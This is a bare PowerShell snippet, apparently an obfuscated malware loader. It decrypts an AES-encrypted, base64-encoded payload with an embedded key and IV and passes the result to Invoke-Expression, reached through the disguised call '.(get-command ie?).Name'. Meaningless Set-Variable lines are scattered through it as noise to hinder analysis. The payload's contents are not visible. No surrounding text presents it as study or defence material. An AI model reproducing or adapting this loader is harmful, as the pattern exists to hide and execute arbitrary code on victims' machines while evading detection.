$cipher = "XtpapReG47vEd/lM3x05g/vLahNkWt6psVv5Nizpo9SE0cqx4vAQg97uyn9NazJItI18iKl1FkbELO0PXGJtGt9PboBVje1a2gp5aZyMxqucphBpPeV5IG4iwpvjKk7i6B85OVGpRFZZawhqBR8Vvw==" $key = "ewWlbl8D1nxFjLD59538DwLAk1H5vqqGkda6HMGXVhs=" $iv = "2QKDliSZZf06FZ9hSybnqA==" $aes = [System.Security.Cryptography.Aes]::Create() sv cut Object $aes.Key = [Convert]::FromBase64String($key) sv $ Script $aes.IV = [Convert]::FromBase64String($iv) sv print New $aes.Mode = "CBC" $aes.Padding = "PKCS7" sv ListDirectory Run $bytes = [Convert]::FromBase64String($cipher) $decryptor = $aes.CreateDecryptor() sv ^ Shell $decrypted = $decryptor.TransformFinalBlock($bytes, 0, $bytes.Length) .(get-command ie?).Name ([System.Text.Encoding]::UTF8.GetString($decrypted))